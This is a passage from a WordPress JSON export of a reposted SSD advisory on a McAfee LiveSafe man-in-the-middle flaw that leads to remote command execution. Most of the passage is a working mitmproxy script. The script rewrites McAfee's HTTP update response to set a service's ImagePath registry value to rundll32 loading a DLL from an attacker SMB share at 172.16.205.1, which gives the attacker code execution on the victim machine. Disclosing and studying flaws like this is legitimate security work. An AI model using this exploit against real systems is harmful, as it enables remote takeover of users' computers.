data-line=\"crayon-59b1c5fbbaeaf438183868-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-32\">32<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-2\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-3\"><span class=\"crayon-p\"># HTTP proxy mode:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-4\"><span class=\"crayon-p\">#&nbsp;&nbsp;mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-5\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-6\"><span class=\"crayon-p\"># Transparent proxy mode: <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-7\"><span class=\"crayon-p\">#&nbsp;&nbsp; mitmproxy -s mcreggeli_inline.py -T &#8211;host<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-8\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-10\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">mitmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">http<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-11\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">lxml <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">etree<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-13\"><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;REG_SZ&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ImagePath&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-15\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">response<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;mscconfig.asp&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">XML<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;frequency&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/webservice-response\/update&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">SubElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;reg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;obfuscate&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#ctx.log(etree.tostring(oxml)) <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tostring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] [MCREGGELI] Payload sent&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">XMLSyntaxError<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] [MCREGGELI] XML deserialization error&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3248\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-300x56.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 07 Sep 2017 06:14:58 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a Remote Code Execution found in McAfee McAfee LiveSafe (MLS) versions prior to 16.0.3. The vulnerability allows network attackers to modify the Windows registry value associated with the McAfee update via the HTTP backend-response. McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3248\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 McAfee LiveSafe MiTM Registry Modification leading to Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12270,11682,10757,12136],"class_list":["post-9160","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-man-in-the-middle","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9160"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9160\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}